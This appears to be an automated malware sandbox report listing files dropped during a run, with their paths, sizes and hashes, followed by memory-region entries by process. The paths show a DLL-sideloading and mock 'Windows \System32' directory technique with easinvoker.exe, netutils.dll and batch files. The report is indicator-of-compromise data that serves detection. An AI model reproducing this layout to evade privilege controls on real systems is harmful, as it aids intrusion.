SHA5121b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba
-
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Public\Libraries\KDECO.batFilesize
155B
MD5213c60adf1c9ef88dc3c9b2d579959d2
SHA1e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA25637c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
-
C:\Users\Public\Libraries\OxzfbvmfO.batFilesize
411B
MD555aba243e88f6a6813c117ffe1fa5979
SHA1210b9b028a4b798c837a182321dbf2e50d112816
SHA2565a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2
SHA51268009c4c9bbea75a3bfa9f79945d30957a95691ea405d031b4ca7f1cb47504bbc768fcae59173885743ad4d6cfdd2313c3fe0acb515e34e5c809ecdc7f45e307
-
C:\Users\Public\Libraries\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Users\Public\Libraries\netutils.dllFilesize
109KB
MD508aecbf3114e569921df32fb5c8a1dd6
SHA19e2fd6ba9b66844292fb49a79fc874ad52f5ecba
SHA2567c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2
SHA512e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57
-
C:\Windows \System32\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\netutils.dllFilesize
109KB
MD508aecbf3114e569921df32fb5c8a1dd6
SHA19e2fd6ba9b66844292fb49a79fc874ad52f5ecba
SHA2567c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2
SHA512e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57
-
C:\Windows \System32\netutils.dllFilesize
109KB
MD508aecbf3114e569921df32fb5c8a1dd6
SHA19e2fd6ba9b66844292fb49a79fc874ad52f5ecba
SHA2567c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2
SHA512e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57
-
C:\windows \system32\KDECO.batFilesize
155B
MD5213c60adf1c9ef88dc3c9b2d579959d2
SHA1e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA25637c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
-
memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmpFilesize
272KB
-
memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmpFilesize
276KB
-
memory/760-193-0x0000000000000000-mapping.dmp
-
memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmpFilesize
276KB
-
memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmpFilesize
272KB
-
memory/860-151-0x0000000000000000-mapping.dmp
-
memory/876-166-0x0000000000000000-mapping.dmp
-
memory/960-171-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/960-168-0x0000000000000000-mapping.dmp
-
memory/1200-212-0x0000000000000000-mapping.dmp
-
memory/1200-216-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/1200-226-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/1200-218-0x0000022572EF0000-0x0000022572F40000-memory.dmpFilesize
320KB
-
memory/1200-220-0x0000022573620000-0x00000225737E2000-memory.dmpFilesize
1.8MB
-
memory/1200-219-0x0000022573000000-0x00000225730B2000-memory.dmpFilesize
712KB
-
memory/1420-211-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/1420-204-0x0000000000000000-mapping.dmp
-
memory/1420-209-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/1440-140-0x0000000000000000-mapping.dmp
-
memory/1476-178-0x0000000000000000-mapping.dmp
-
memory/1716-160-0x0000000000000000-mapping.dmp
-
memory/1732-143-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/1732-141-0x0000000000000000-mapping.dmp
-
memory/1732-146-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmpFilesize
272KB
-
memory/2040-221-0x0000000000000000-mapping.dmp
-
memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmpFilesize
276KB
-
memory/2316-210-0x0000000000000000-mapping.dmp
-
memory/2532-199-0x0000000000000000-mapping.dmp
-
memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmpFilesize
188KB
-
memory/2580-152-0x0000000000000000-mapping.dmp
-
memory/2612-157-0x0000000000000000-mapping.dmp
-
memory/2892-154-0x0000000000000000-mapping.dmp
-
memory/2964-173-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/2964-172-0x0000000000000000-mapping.dmp
-
memory/2964-188-0x0000000000400000-0x000000000047F095-memory.dmpFilesize
508KB
-
memory/2964-177-0x0000000000400000-0x000000000047F095-memory.dmpFilesize
508KB
-
memory/2964-176-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/2964-175-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/3184-158-0x0000000000000000-mapping.dmp
-
memory/3200-144-0x0000000000000000-mapping.dmp
-
memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmpFilesize
188KB
-
memory/3344-149-0x0000000000000000-mapping.dmp
-
memory/3444-179-0x0000000000000000-mapping.dmp
-
memory/3444-181-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/3444-185-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/3808-203-0x0000000000000000-mapping.dmp
-
memory/3828-155-0x0000000000000000-mapping.dmp
-
memory/4124-165-0x0000000000000000-mapping.dmp
-
memory/4536-139-0x0000029273360000-0x000002927337E000-memory.dmpFilesize
120KB
-
memory/4536-138-0x00000292737B0000-0x0000029273826000-memory.dmpFilesize
472KB
-
memory/4536-137-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/4536-135-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmpFilesize
10.8MB
-
memory/4536-134-0x0000029258920000-0x0000029258942000-memory.dmpFilesize
136KB
-
memory/4536-132-0x0000000000000000-mapping.dmp
-
memory/4932-217-0x0000000000000000-mapping.dmp
-
memory/5108-183-0x0000000000000000-mapping.dmp
-
memory/5108-186-0x0000000002270000-0x000000000229F000-memory.dmpFilesize
188KB